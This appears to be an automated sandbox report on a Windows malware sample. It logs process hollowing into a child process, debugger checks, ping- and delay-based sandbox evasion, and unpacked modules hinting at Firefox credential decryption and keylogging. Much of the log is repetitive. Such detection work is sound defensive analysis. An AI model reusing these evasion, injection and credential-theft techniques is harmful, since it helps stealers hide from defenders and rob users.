Source: C:\Users\user\Links\dajivhqI.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Uses ping.exe to sleep

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 10
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 10			Jump to behavior

Source: C:\Users\user\Links\dajivhqI.pif	Memory allocated: 29DC0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Memory allocated: 2A320000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Memory allocated: 2A020000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Links\dajivhqI.pif

7_2_004019F0

Source: C:\Users\user\Links\dajivhqI.pif	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Thread delayed: delay time: 599890	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Thread delayed: delay time: 599671	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Thread delayed: delay time: 599561	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Thread delayed: delay time: 599452	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Thread delayed: delay time: 599343	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Thread delayed: delay time: 599234	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Thread delayed: delay time: 599125	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Thread delayed: delay time: 599015	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Thread delayed: delay time: 598906	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Thread delayed: delay time: 598796	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Thread delayed: delay time: 598687	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Thread delayed: delay time: 598576	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Thread delayed: delay time: 598468	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Thread delayed: delay time: 598359	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Thread delayed: delay time: 598249	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Thread delayed: delay time: 598140	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Thread delayed: delay time: 598031	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Thread delayed: delay time: 597921	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Thread delayed: delay time: 597812	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Thread delayed: delay time: 597703	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Thread delayed: delay time: 597593	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Thread delayed: delay time: 597483	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Thread delayed: delay time: 597375	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Thread delayed: delay time: 597265	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Thread delayed: delay time: 597156	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Thread delayed: delay time: 597046	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Thread delayed: delay time: 596937	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Thread delayed: delay time: 596828	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Thread delayed: delay time: 596718	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Thread delayed: delay time: 596609	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Thread delayed: delay time: 596499	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Thread delayed: delay time: 596390	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Thread delayed: delay time: 596248	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Thread delayed: delay time: 596137	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Thread delayed: delay time: 596028	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Thread delayed: delay time: 595885	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Thread delayed: delay time: 595765	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Thread delayed: delay time: 595656	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Thread delayed: delay time: 595546	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Thread delayed: delay time: 595437	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Thread delayed: delay time: 595328	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Thread delayed: delay time: 595218	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Thread delayed: delay time: 595109	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Thread delayed: delay time: 595000	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Thread delayed: delay time: 594890	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Thread delayed: delay time: 594781	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Thread delayed: delay time: 594671	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Thread delayed: delay time: 594562	Jump to behavior

Source: C:\Users\user\Links\dajivhqI.pif	Window / User API: threadDelayed 1551			Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Window / User API: threadDelayed 8302			Jump to behavior

Source: C:\Users\user\Links\dajivhqI.pif TID: 2732	Thread sleep count: 33 > 30	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif TID: 2732	Thread sleep time: -30437127721620741s >= -30000s	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif TID: 2732	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif TID: 4232	Thread sleep count: 1551 > 30	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif TID: 2732	Thread sleep time: -599890s >= -30000s	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif TID: 4232	Thread sleep count: 8302 > 30	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif TID: 2732	Thread sleep time: -599781s >= -30000s	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif TID: 2732	Thread sleep time: -599671s >= -30000s	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif TID: 2732	Thread sleep time: -599561s >= -30000s	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif TID: 2732	Thread sleep time: -599452s >= -30000s	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif TID: 2732	Thread sleep time: -599343s >= -30000s	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif TID: 2732	Thread sleep time: -599234s >= -30000s	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif TID: 2732	Thread sleep time: -599125s >= -30000s	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif TID: 2732	Thread sleep time: -599015s >= -30000s	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif TID: 2732	Thread sleep time: -598906s >= -30000s	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif TID: 2732	Thread sleep time: -598796s >= -30000s	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif TID: 2732	Thread sleep time: -598687s >= -30000s	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif TID: 2732	Thread sleep time: -598576s >= -30000s	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif TID: 2732	Thread sleep time: -598468s >= -30000s	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif TID: 2732	Thread sleep time: -598359s >= -30000s	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif TID: 2732	Thread sleep time: -598249s >= -30000s	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif TID: 2732	Thread sleep time: -598140s >= -30000s	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif TID: 2732	Thread sleep time: -598031s >= -30000s	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif TID: 2732	Thread sleep time: -597921s >= -30000s	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif TID: 2732	Thread sleep time: -597812s >= -30000s	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif TID: 2732	Thread sleep time: -597703s >= -30000s	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif TID: 2732	Thread sleep time: -597593s >= -30000s	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif TID: 2732	Thread sleep time: -597483s >= -30000s	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif TID: 2732	Thread sleep time: -597375s >= -30000s	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif TID: 2732	Thread sleep time: -597265s >= -30000s	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif TID: 2732	Thread sleep time: -597156s >= -30000s	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif TID: 2732	Thread sleep time: -597046s >= -30000s	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif TID: 2732	Thread sleep time: -596937s >= -30000s	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif TID: 2732	Thread sleep time: -596828s >= -30000s	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif TID: 2732	Thread sleep time: -596718s >= -30000s	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif TID: 2732	Thread sleep time: -596609s >= -30000s	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif TID: 2732	Thread sleep time: -596499s >= -30000s	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif TID: 2732	Thread sleep time: -596390s >= -30000s	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif TID: 2732	Thread sleep time: -596248s >= -30000s	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif TID: 2732	Thread sleep time: -596137s >= -30000s	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif TID: 2732	Thread sleep time: -596028s >= -30000s	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif TID: 2732	Thread sleep time: -595885s >= -30000s	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif TID: 2732	Thread sleep time: -595765s >= -30000s	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif TID: 2732	Thread sleep time: -595656s >= -30000s	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif TID: 2732	Thread sleep time: -595546s >= -30000s	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif TID: 2732	Thread sleep time: -595437s >= -30000s	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif TID: 2732	Thread sleep time: -595328s >= -30000s	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif TID: 2732	Thread sleep time: -595218s >= -30000s	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif TID: 2732	Thread sleep time: -595109s >= -30000s	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif TID: 2732	Thread sleep time: -595000s >= -30000s	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif TID: 2732	Thread sleep time: -594890s >= -30000s	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif TID: 2732	Thread sleep time: -594781s >= -30000s	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif TID: 2732	Thread sleep time: -594671s >= -30000s	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif TID: 2732	Thread sleep time: -594562s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\PING.EXE	Last function: Thread delayed

Source: C:\Users\user\Desktop\y79a2l1FY5.exe

Code function: 0_2_029C52F8 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,

0_2_029C52F8

Source: C:\Users\user\Links\dajivhqI.pif	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Thread delayed: delay time: 599890	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Thread delayed: delay time: 599671	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Thread delayed: delay time: 599561	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Thread delayed: delay time: 599452	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Thread delayed: delay time: 599343	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Thread delayed: delay time: 599234	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Thread delayed: delay time: 599125	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Thread delayed: delay time: 599015	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Thread delayed: delay time: 598906	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Thread delayed: delay time: 598796	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Thread delayed: delay time: 598687	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Thread delayed: delay time: 598576	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Thread delayed: delay time: 598468	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Thread delayed: delay time: 598359	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Thread delayed: delay time: 598249	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Thread delayed: delay time: 598140	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Thread delayed: delay time: 598031	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Thread delayed: delay time: 597921	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Thread delayed: delay time: 597812	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Thread delayed: delay time: 597703	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Thread delayed: delay time: 597593	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Thread delayed: delay time: 597483	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Thread delayed: delay time: 597375	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Thread delayed: delay time: 597265	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Thread delayed: delay time: 597156	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Thread delayed: delay time: 597046	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Thread delayed: delay time: 596937	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Thread delayed: delay time: 596828	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Thread delayed: delay time: 596718	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Thread delayed: delay time: 596609	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Thread delayed: delay time: 596499	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Thread delayed: delay time: 596390	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Thread delayed: delay time: 596248	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Thread delayed: delay time: 596137	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Thread delayed: delay time: 596028	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Thread delayed: delay time: 595885	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Thread delayed: delay time: 595765	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Thread delayed: delay time: 595656	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Thread delayed: delay time: 595546	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Thread delayed: delay time: 595437	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Thread delayed: delay time: 595328	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Thread delayed: delay time: 595218	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Thread delayed: delay time: 595109	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Thread delayed: delay time: 595000	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Thread delayed: delay time: 594890	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Thread delayed: delay time: 594781	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Thread delayed: delay time: 594671	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Thread delayed: delay time: 594562	Jump to behavior

Source: y79a2l1FY5.exe, 00000000.00000002.882851060.000000000080E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll-
Source: dajivhqI.pif, 00000007.00000002.3369058977.0000000028266000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\y79a2l1FY5.exe	API call chain: ExitProcess graph end node			graph_0-25709
Source: C:\Users\user\Links\dajivhqI.pif	API call chain: ExitProcess graph end node			graph_7-53715

Source: C:\Users\user\Links\dajivhqI.pif

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Source: C:\Users\user\Desktop\y79a2l1FY5.exe

Code function: 0_2_029DA5B0 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent,

0_2_029DA5B0

Source: C:\Users\user\Desktop\y79a2l1FY5.exe

Process queried: DebugPort

Jump to behavior

Source: C:\Users\user\Links\dajivhqI.pif

Code function: 7_2_2A1CB270 LdrInitializeThunk,LdrInitializeThunk,

7_2_2A1CB270

Source: C:\Users\user\Links\dajivhqI.pif

Code function: 7_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

7_2_0040CE09

Source: C:\Users\user\Links\dajivhqI.pif

7_2_004019F0

Source: C:\Users\user\Desktop\y79a2l1FY5.exe

Code function: 0_2_029D3E20 LoadLibraryW,GetProcAddress,WriteProcessMemory,FreeLibrary,

0_2_029D3E20

Source: C:\Users\user\Links\dajivhqI.pif

Code function: 7_2_0040ADB0 GetProcessHeap,HeapFree,

7_2_0040ADB0

Source: C:\Users\user\Links\dajivhqI.pif

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	7_2_0040CE09
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	7_2_0040E61C
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_00416F6A
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_2_004123F1 SetUnhandledExceptionFilter,	7_2_004123F1
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_1_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	7_1_0040CE09
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_1_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	7_1_0040E61C
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_1_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_1_00416F6A
Source: C:\Users\user\Links\dajivhqI.pif	Code function: 7_1_004123F1 SetUnhandledExceptionFilter,	7_1_004123F1

Source: C:\Users\user\Links\dajivhqI.pif

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

.NET source code references suspicious native API functions

Source: 7.2.dajivhqI.pif.2a160000.7.raw.unpack, UltraSpeed.cs	Reference to suspicious API methods: MapVirtualKey(VKCode, 0u)
Source: 7.2.dajivhqI.pif.2a160000.7.raw.unpack, FFDecryptor.cs	Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(hModule, method), typeof(T))
Source: 7.2.dajivhqI.pif.2a160000.7.raw.unpack, FFDecryptor.cs	Reference to suspicious API methods: hModuleList.Add(LoadLibrary(text9 + "\\mozglue.dll"))

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\y79a2l1FY5.exe

Memory allocated: C:\Users\user\Links\dajivhqI.pif base: 400000 protect: page execute and read and write

Jump to behavior

Sample uses process hollowing technique

Source: C:\Users\user\Desktop\y79a2l1FY5.exe

Section unmapped: C:\Users\user\Links\dajivhqI.pif base address: 400000

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\y79a2l1FY5.exe

Memory written: C:\Users\user\Links\dajivhqI.pif base: 361008

Jump to behavior

Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Process created: C:\Users\user\Links\dajivhqI.pif C:\\Users\\user\\Links\dajivhqI.pif			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 10			Jump to behavior

Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,	0_2_029C54BC
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Code function: GetLocaleInfoA,	0_2_029CA0B8
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Code function: GetLocaleInfoA,	0_2_029CA104
Source: C:\Users\user\Desktop\y79a2l1FY5.exe	Code function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,	0_2_029C55C8
Source: C:\Users\user\Links\dajivhqI.pif	Code function: GetLocaleInfoA,	7_2_00417A20
Source: C:\Users\user\Links\dajivhqI.pif	Code function: GetLocaleInfoA,	7_1_00417A20

Source: C:\Users\user\Links\dajivhqI.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Links\dajivhqI.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
